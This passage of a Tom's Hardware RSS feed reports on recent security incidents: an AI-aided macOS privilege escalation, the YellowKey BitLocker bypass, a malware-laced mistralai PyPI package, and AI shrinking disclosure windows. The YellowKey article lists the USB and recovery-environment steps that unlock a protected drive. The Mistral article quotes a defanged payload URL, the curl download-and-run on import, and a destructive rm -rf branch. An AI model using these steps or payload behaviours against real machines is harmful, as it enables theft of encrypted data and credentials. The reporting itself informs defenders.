                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/7nJebNFNWuydWZGUNQ2N6Y-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sat, 16 May 2026 11:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/7nJebNFNWuydWZGUNQ2N6Y-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Sick Macbook]]></media:description>                                                            <media:text><![CDATA[Sick Macbook]]></media:text>
                                <media:title type="plain"><![CDATA[Sick Macbook]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/7nJebNFNWuydWZGUNQ2N6Y-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Thanks to AI-assisted security research, hackers with hats of various colors are finding exploits everywhere. Linux has had its worst week in years with the<a href="https://www.tomshardware.com/software/linux/cisa-flags-actively-exploited-copy-fail-linux-kernel-flaw-enabling-root-takeover-across-major-distros-unpatched-systems-may-remain-vulnerable-to-attack"> <u>CopyFail</u></a> and Dirty Frag root-gaining vulnerabilities, and things aren't much rosier at Microsoft, thanks to the YellowKey BitLocker bypass, as well as GreenPlasma and RedSun privilege-gaining exploits. Now, it's Apple's turn with a<a href="https://blog.calif.io/p/first-public-kernel-memory-corruption"> <u>local privilege escalation</u></a> that gets past the M5 chips' much-vaunted Memory Integrity Enforcement (MIE).</p><p>There aren't many technical details, but the vulnerability is simple in practice: run a command as a standard user and gain root (administrator) access to the machine. Macs are rarely servers, so the practical impact is limited. However, the exploit remains concerning, as it's relatively easy to trick a user into running it and, with full system control, also hard to find and remove. The research team in question is named Calif, and as far as they know, the boffins there are the only ones making a public disclosure of this issue. Such assumptions are tricky<a href="https://www.tomshardware.com/tech-industry/cyber-security/standard-90-day-vulnerability-disclosure-policy-is-likely-dead-thanks-to-ai-leaving-worlds-systems-exposed-to-zero-day-attacks-security-expert-details-how-llm-assisted-bug-hunting-ushers-in-a-new-cyberworld-orders"> <u>in this day and age</u></a>, though.</p><p>Mercifully for Captain Cook's ship, instead of being a zero-day reveal out of nowhere that left systems administrators scrambling, the exploit in question was disclosed to the company in advance (in person, no less). Calif published the vulnerability overview as part of a series of blog posts called the Month of AI-Discovered Bugs, since this new Apple vulnerability falls within a set of security findings aided by AI tools — in this case, Anthropic's Mythos Preview.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: AI and data centers</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Vh4nY3pMCcmra2ymXah9S7" name="Microsoft data center in Mount Pleasant, Wisconsin" caption="" alt="Microsoft data center in Mount Pleasant, Wisconsin" src="https://cdn.mos.cms.futurecdn.net/Vh4nY3pMCcmra2ymXah9S7.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Microsoft)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/photonics-and-high-speed-data-movement-is-the-next-big-ai-bottleneck-following-copper-power-dram-and-nand?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Photonics and high-speed data movement is the next big AI bottleneck</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cooling/the-data-center-cooling-state-of-play-2025-liquid-cooling-is-on-the-rise-thermal-density-demands-skyrocket-in-ai-data-centers-and-tsmc-leads-with-direct-to-silicon-solutions?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">The data center cooling state of play</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/artificial-intelligence/massive-ai-data-center-buildouts-are-squeezing-energy-supplies-new-energy-methods-are-being-explored-as-power-demands-are-set-to-skyrocket?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Massive AI data center buildouts are squeezing energy supplies</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/networking/ultra-ethernet-the-data-center-interconnection-of-tomorrow-detailed?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Ultra Ethernet: The data center interconnection of tomorrow</a></li></ul></p></div></div><p>The researchers tested their code on an Apple M5 machine and macOS 26.4.1. The exploit chain impressively sneaks past MIE, a security feature present on M5 and A19 chips that labels each 16-byte memory slice with a 4-bit tag associated with the pointers that use it. MIE is enforced at the hardware level in a hypervisor-like configuration and effectively protects against most common classes of security exploits, namely, but not only, buffer overflows and use-after-free vulnerabilities.</p><p>As an oversimplification, MIE ensures that any memory read or write operation acts on the data that it was originally meant to, even at the kernel level. If that doesn't happen, either your application has a bug, or someone's up to shenanigans. The base feature is part of ARM MTE, and MIE is an Apple-added layer that enforces the said checks at the hardware level, with purportedly little to no performance overhead, and only 3% memory wastage. This blog post<a href="https://8ksec.io/mie-deep-dive-kernel/"> <u>goes into more detail on the subject</u></a>, and it's quite an interesting read.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Microsoft BitLocker-protected drives can now be opened with just some files on a USB stick — YellowKey zero-day exploit demonstrates an apparent backdoor ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/microsoft-bitlocker-protected-drives-can-now-be-opened-with-just-some-files-on-a-usb-stick-yellowkey-zero-day-exploit-demonstrates-an-apparent-backdoor</link>
                                                                            <description>
                            <![CDATA[ Microsoft Bitlocker-protected drives can be opened with just some files on a stick ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Ffyp4SrQ9jGcm3nVJETQQG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/NoMA8eAVErtvRS5rFYuiQm-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 13 May 2026 15:02:04 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/NoMA8eAVErtvRS5rFYuiQm-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Falling laptop cracking]]></media:description>                                                            <media:text><![CDATA[Falling laptop cracking]]></media:text>
                                <media:title type="plain"><![CDATA[Falling laptop cracking]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/NoMA8eAVErtvRS5rFYuiQm-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>There's nothing more dangerous than a bored engineer with a screwdriver, and hell hath no fury like a security researcher scorned. Last month, Security researcher <a href="https://deadeclipse666.blogspot.com/">Chaotic Eclipse</a> (aka <a href="https://github.com/Nightmare-Eclipse/">Nightmare-Eclipse</a>) published two zero-day exploits, <a href="https://www.cyderes.com/howler-cell/windows-zero-day-bluehammer">BlueHammer</a> and <a href="https://github.com/Nightmare-Eclipse/RedSun">RedSun</a>, that made Windows Defender offer up system administrator privileges. They did this after their disclosure reports were <a href="https://deadeclipse666.blogspot.com/2026/04/public-disclosure-response-for-cve-2026.html">allegedly dismissed</a> by Microsoft's security team, resulting in a vendetta of sorts. Eclipse has now done it again, posting two new zero-day exploits, the first one an extremely serious BitLocker exploit named Yellow Key that grants full access to a locked drive. The second one, GreenPlasma, doesn't have a complete proof-of-concept (PoC), but it allegedly performs a local privilege escalation and gains system-level access. Given Eclipse's track record, it's a fair bet that it works as advertised.</p><p>YellowKey can be triggered simply by merely copying some files to a USB stick and rebooting to the Windows Recovery Environment. We tested this ourselves, and sure enough, not only does it work, it bears all the hallmarks of a backdoor, down to the exploit's files disappearing from the USB stick after it's used once.</p><p>The process is dead simple: grab any USB stick, get write access to the "System Volume Information," and copy into it the "FsTx" folder and its contents. Shift+click Restart to get Windows to the recovery environment, but then switch to holding down the Control key and don't let go. The machine will reboot, and without asking any questions or showing any menus, will drop you in an elevated command line with full access to the formerly Bitlocked drive, without asking for any keys.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:52.30%;"><img id="rEY5giBuj6UnfiXHaZrkoa" name="YellowKey Bitlocker exploit" alt="YellowKey Bitlocker exploit" src="https://cdn.mos.cms.futurecdn.net/rEY5giBuj6UnfiXHaZrkoa.png" mos="" align="middle" fullscreen="" width="1000" height="523" attribution="" endorsement="" class="inline"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Look ma, no keys! </span><span class="credit" itemprop="copyrightHolder">(Image credit: Future)</span></figcaption></figure><p>To say that this is dangerous is an understatement. Not only is it an immediate concern as BitLocker cannot be trusted for encrypting drives, but the way the exploit executes and its files disappear also raises very uncomfortable corporate and/or political questions. YellowKey also <a href="https://securityonline.info/windows-bitlocker-bypass-yellowkey-greenplasma-poc-disclosure/" target="_blank">reportedly</a> works in Windows Server 2022 and 2025, but not in Windows 10. </p><p>BitLocker protects millions of machines worldwide across home, enterprises, and governments, especially as it's enabled by default in Windows 11. As far as we can tell, a drive can't be taken from machine Alice and opened in machine Bob because the encryption keys are in Alice's TPM, but it's not hard to just up and steal a laptop, mini-PC, or even desktop.</p><p><a href="https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html" target="_blank">Eclipse notes</a> that using a full TPM-and-PIN setup doesn't help, as apparently, they have a variant for that scenario that they haven't published a PoC for. They also state the vulnerability is well-hidden, and that they "could have made some insane cash selling this, but no amount of money will stand between me and my determination against Microsoft." </p><p>As for GreenPlasma, it's supposed to get an attacker full system-level access (even higher than administrator) by manipulating the CTFMon process into placing a crafted memory section object — a slice of memory that can be shared between processes or mapped to a file — in any Windows' Object Manager section the SYSTEM user has write access to, bypassing regular access controls.</p><p>From thereon, the exploit code can get access to regions of memory they're not meant to and leverage that for any number of shenanigans, the most obvious one being getting full system access. This is bad enough for a desktop system, as any program can get full access, but it's particularly bad for server environments, where any regular user can get control of the server and, by extension, everyone else's data.</p><p>Meanwhile, as of this writing, there is no official response from the company about YellowKey or GreenPlasma. BlueHammer has already been patched, and Chaotic claims that Microsoft silently patched RedSun, but there's no official word on that either.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Compromised Mistral AI and TanStack packages may have exposed GitHub, cloud and CI/CD credentials in 'mini Shai Hulud' malware infection — supply-chain campaign spreads across npm and AI developer ecosystems like wildfire ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/compromised-mistral-ai-and-tanstack-packages-may-have-exposed-github-cloud-and-ci-cd-credentials-in-mini-shai-hulud-malware-infection-supply-chain-campaign-spreads-across-npm-and-ai-developer-ecosystems-like-wildfire</link>
                                                                            <description>
                            <![CDATA[ Microsoft says attackers compromised the mistralai PyPI package with malware that executed on import, while researchers link related npm compromises affecting TanStack and Mistral SDKs to the broader “Mini Shai-Hulud” supply-chain campaign. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">rxnZrrFujL6LkXkP7dQUdc</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 May 2026 11:53:04 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Etiido Uko ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/BBrMt7jWtSo2Dc3iKoroyD.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Etiido Uko is a mechanical engineer and senior technical writer with over nine years of experience in documentation and reporting. He is deeply passionate about all things engineering and technology, and is an expert in gadgets, manufacturing, robotics, automotive, and aerospace. His work spans content creation for industry leaders across multiple sectors, including Autodesk, Siemens, Xometry, Telus, and Coca-Cola. When he is not writing or keeping up with the latest innovations, you can find him exploring lands unknown. Check out more of his work at etiidowrites.com.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[generic hack screen]]></media:description>                                                            <media:text><![CDATA[generic hack screen]]></media:text>
                                <media:title type="plain"><![CDATA[generic hack screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Microsoft Threat Intelligence said in an <a href="https://x.com/MsftSecIntel/status/2054041471280423424?s=20" target="_blank">X post</a> on Monday that it is investigating a compromise of the mistralai PyPI package after attackers reportedly injected malicious code that automatically executed on import, downloaded a secondary payload disguised as transformers.pyz, and launched malware on Linux systems — the latest incident researchers believe may be linked to the broader “<a href="https://www.tomshardware.com/tech-industry/cyber-security/shai-hulud-malware-campaign-dubbed-the-largest-and-most-dangerous-npm-supply-chain-compromise-in-history-hundreds-of-javascript-packages-affected" target="_blank">Mini Shai-Hulud</a>” software supply-chain campaign targeting developer ecosystems.</p><p>According to Microsoft, the compromised mistralai package version 2.4.6 contained malicious code inserted into mistralai/client/__init__.py that silently downloaded a file from a remote IP address to /tmp/transformers.pyz and executed it in the background whenever the package was imported on Linux machines.</p><p>The filename appears deliberately chosen to resemble <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/chinese-llms-storm-hugging-faces-chatbot-benchmark-leaderboard-alibaba-runs-the-board-as-major-us-competitors-have-worsened" target="_blank">Hugging Face</a>’s widely used Transformers AI framework, potentially allowing the malware to blend into machine learning environments and evade suspicion. Microsoft said the second-stage payload functioned primarily as a credential stealer, but also contained country-aware logic and a destructive branch capable of executing rm -rf / under certain geographic conditions. The payload contained logic designed to avoid Russian-language environments, a behavior commonly observed in some cybercriminal malware campaigns, though such checks are not definitive indicators of attribution.</p><div class="see-more see-more--clipped"><blockquote class="twitter-tweet hawk-ignore" data-lang="en"><p lang="en" dir="ltr">Microsoft is investigating mistralai PyPI package v2.4.6 compromise. Attackers injected code in mistralai/client/__init__.py that executes on import, downloads hxxps://83[.]142[.]209[.]194/transformers.pyz to /tmp/transformers.pyz, and launches a second-stage payload on Linux.… pic.twitter.com/9Xfb07Hcia<a href="https://twitter.com/cantworkitout/status/2054041471280423424">May 12, 2026</a></p></blockquote><div class="see-more__filter"></div></div><p>The disclosure comes amid a growing wave of <a href="https://www.tomshardware.com/tech-industry/cyber-security/javascript-packages-with-billions-of-downloads-were-injected-with-malicious-code-in-worlds-largest-supply-chain-hack-geared-to-steal-crypto-a-phishing-email-is-all-it-took-to-undermine-npm-packages" target="_blank">software supply-chain compromises </a>affecting both npm and PyPI ecosystems. Earlier Monday, security firm Aikido warned that malicious package versions tied to the popular TanStack JavaScript ecosystem had been compromised in two separate attack waves beginning around 19:20 UTC. Affected packages reportedly included @tanstack/react-router, @tanstack/history, and @tanstack/router-core, components collectively downloaded tens of millions of times per week. </p><p>Hours later, Aikido said several Mistral npm SDK packages had also been compromised as part of the same ongoing “Mini Shai-Hulud” campaign, including @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. The firm warned developers to immediately rotate GitHub tokens, npm credentials, cloud API keys, and CI/CD secrets if affected packages had been installed.</p><p>Microsoft has not publicly attributed the PyPI compromise to Mini Shai-Hulud. Still, the incidents share several characteristics, including malicious code inserted into trusted packages, staged payload downloads, credential theft, and automatic execution during installation or import. That overlap has raised concerns that attackers are increasingly targeting developer infrastructure itself rather than end users directly.</p><p>Modern development environments often contain high-value credentials, including GitHub personal access tokens, cloud deployment keys, SSH credentials, npm publishing tokens, and CI/CD system access. A compromised developer workstation or CI runner can therefore provide attackers with a path into much larger software ecosystems, allowing malicious updates to spread through legitimate package distribution channels.</p><p>The behavior observed in the compromised Mistralai package reflects that escalation risk. According to Microsoft’s analysis, the injected code silently used curl to retrieve the secondary payload before launching it as a detached background process designed to continue operating independently of the original Python session. The malware also reportedly suppressed execution errors and limited activity to Linux systems, the dominant operating system across servers, cloud environments, and many AI workloads. </p><p>Supply-chain attacks have become an increasingly serious concern across the software industry because of the sheer scale at which trusted dependencies are reused. A single compromised package can rapidly propagate into thousands of downstream applications, enterprise environments, and production systems. Major incidents in recent years have included the SolarWinds breach, the event-stream npm compromise, the 3CX supply-chain attack, and the XZ Utils backdoor attempt.</p><p>The latest wave appears particularly notable for simultaneously targeting AI tooling, cloud SDKs, and widely used frontend development frameworks. Researchers believe the campaign’s primary objective is credential theft, potentially allowing attackers to compromise additional packages, maintainer accounts, and publishing infrastructure in a cascading chain of ecosystem infections.</p><p>Microsoft advised organizations to isolate affected Linux hosts, block outbound connections to the malicious IP address, hunt for indicators including /tmp/transformers.pyz, pgmonitor.py, and pgsql-monitor.service, and rotate any potentially exposed credentials immediately. The compromises are still under investigation, and additional affected packages may emerge as maintainers and security firms continue auditing publishing infrastructure and compromised credentials.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Standard 90-day vulnerability disclosure policy is likely dead thanks to AI, expert warns that AI can weaponize patches in 30 minutes — LLM-assisted bug-hunting ushers in a new cyberworld order ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/standard-90-day-vulnerability-disclosure-policy-is-likely-dead-thanks-to-ai-leaving-worlds-systems-exposed-to-zero-day-attacks-security-expert-details-how-llm-assisted-bug-hunting-ushers-in-a-new-cyberworld-orders</link>
                                                                            <description>
                            <![CDATA[ AI-assisted bug detection has massively accelerated the timeline in which new security vulnerabilities are discovered, and one researcher argues that has killed the standard 90-day disclosure policy. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">YLJpCzNJmiTT57AtgJXWWW</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/hckLQbRUHGWnHJfJQyPJEG-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 May 2026 11:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/hckLQbRUHGWnHJfJQyPJEG-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Running robot]]></media:description>                                                            <media:text><![CDATA[Running robot]]></media:text>
                                <media:title type="plain"><![CDATA[Running robot]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/hckLQbRUHGWnHJfJQyPJEG-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>In case you haven't been in the cybersecurity news lately, here's a quick summary: discoveries and exploits of high-profile software vulnerabilities are becoming faster than ever, in part due to AI-assisted code scanning tools. For example, most every Linux distribution recently found itself on the wrong end of <a href="https://www.tomshardware.com/software/linux/cisa-flags-actively-exploited-copy-fail-linux-kernel-flaw-enabling-root-takeover-across-major-distros-unpatched-systems-may-remain-vulnerable-to-attack">the Copy Fail</a> and <a href="https://www.tomshardware.com/tech-industry/cyber-security/dirty-frag-exploit-gets-root-on-most-linux-machines-since-2017-no-patches-available-no-warning-given-copy-fail-like-vulnerability-had-its-embargo-broken">Dirty Frag</a> privilege escalation vulnerabilities (gaining administrator access with a local account), for which patches hadn't been made widely available as there wasn't enough time between their disclosure and publication.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: AI and data centers</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Vh4nY3pMCcmra2ymXah9S7" name="Microsoft data center in Mount Pleasant, Wisconsin" caption="" alt="Microsoft data center in Mount Pleasant, Wisconsin" src="https://cdn.mos.cms.futurecdn.net/Vh4nY3pMCcmra2ymXah9S7.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Microsoft)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/photonics-and-high-speed-data-movement-is-the-next-big-ai-bottleneck-following-copper-power-dram-and-nand?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Photonics and high-speed data movement is the next big AI bottleneck</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cooling/the-data-center-cooling-state-of-play-2025-liquid-cooling-is-on-the-rise-thermal-density-demands-skyrocket-in-ai-data-centers-and-tsmc-leads-with-direct-to-silicon-solutions?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">The data center cooling state of play</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/artificial-intelligence/massive-ai-data-center-buildouts-are-squeezing-energy-supplies-new-energy-methods-are-being-explored-as-power-demands-are-set-to-skyrocket?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Massive AI data center buildouts are squeezing energy supplies</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/networking/ultra-ethernet-the-data-center-interconnection-of-tomorrow-detailed?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Ultra Ethernet: The data center interconnection of tomorrow</a></li></ul></p></div></div><p>Himanshu Anand, a security researcher, <a href="https://blog.himanshuanand.com/2026/05/the-90-day-disclosure-policy-is-dead/" target="_blank">wrote a lengthy blog post</a> explaining why the industry-standard 90-day disclosure window and associated procedure are effectively dead in this AI-powered world, and his conclusions might lead developers and sysadmins to pick up a stiff drink. On the developer side, he suggests programmers to add LLM to their code push, deployment, and dependency-checking steps as a countermeasure, as attackers are already using LLMs to undercover vunerabilities.</p><p>The crux of the matter is the fact that although a bot isn't necessarily any smarter than a human at programming or hunting for security vulnerabilities, a LLM that can do so at full mental capacity 24/7 and is brutally effective at pattern recognition (built <em>with </em>pattern recognition, if we must). The vast majority of security exploits are rooted in specific bad programming habits, something a bot excels at noticing quickly and repeatedly.</p><p>Both aforementioned exploits for the Linux kernel took advantage of insecure zero-copy mechanisms (performing calculations on data in-place instead of copying/calculating/replacing). In both cases, although the issues were communicated to the kernel team in advance, they were made public far before the usual 90-day period — just over a week, in the case of Dirty Frag.</p><p>Although nobody said it out loud, the general assumption was that white-hat reveals were done with little to no advance warning because the exploits were already in the wild, so there was nothing to gain and everything to lose by keeping them under wraps.</p><p>To illustrate this point, Anand presents one of his own bug reports to an unnamed e-shop, wherein he found and reported an unpatched security bug that would let attackers buy expensive items for the princely sum of $0. Much to his surprise, he got a reply stating that 10 (!) other researchers had already reported the issue over six weeks. Conferring with a colleague, they noticed that "LLM-assisted hunters were converging on the same bugs almost simultaneously."</p><p>This conclusion is further backed up by triage engineer @d0rsky, <a href="https://x.com/d0rsky/status/2040848736713126365" target="_blank">who notes that</a> once a new vulnerability is found, he immediately sees "a wave of duplicate reports within days." Quite poignantly, Dorsky posits: "if researchers can replicate these findings so quickly, what's stopping black-hats from doing the same before the issue is fixed?" Anand further drives the point home by saying he made an exploit for a published and patched vulnerability in the React framework in just 30 minutes using LLM tools.</p><p>In his conclusion, Anand doesn't mince words, stating that in this new world where non-ethical hackers can so quickly analyze code using AI, the 90-day window protects nobody, and that the usual monthly patch cycles are equally dead, as "[the] 30 day window between vulnerability and fix assumes attackers are slower than your release train." He urges developers to treat "every critical security issue as P0 and fix it immediately," as they can assume that said vulnerability is already under active exploitation. To wit, "if you are reading CVE descriptions while attackers are reading <em>git log --diff-filter=M</em>, you are already behind."</p><p>Ironically enough, open-source software enjoys high security standards due to code being publicly available for scrutiny and correction, but LLMs are turning that characteristic into a double-edged sword. Having said that, in the OSS world, a patch can also be created and distributed within hours, something the Mozilla team recently proved by <a href="https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/">posting 423 security fixes in April alone</a>.</p><p>As for closed-source software, well, let's just say that tireless bots are equally good at decompiling and network scanning as they are at source code analysis, and it's likely enough that Microsoft, Apple, or Google will have their Copy Fail moments sooner rather than later. <a href="https://blog.himanshuanand.com/2026/05/the-90-day-disclosure-policy-is-dead/">Do read the entirety</a> of Anand's post, as it's quite elucidative.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google finds first AI-developed zero-day that bypasses 2FA — self-morphing malware and Gemini-powered backdoors signal a new era of cybercrime ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/google-finds-first-ai-developed-zero-day-that-bypasses-2fa-self-morphing-malware-and-gemini-powered-backdoors-signal-a-new-era-of-cybercrime</link>
                                                                            <description>
                            <![CDATA[ Google cybersecurity boffins found at least one AI-developed zero-day exploit ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">95RtonED96LhnqzB5MjB8C</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/HW4qxknDwJwEJwDFgE3z9o-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 May 2026 10:40:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
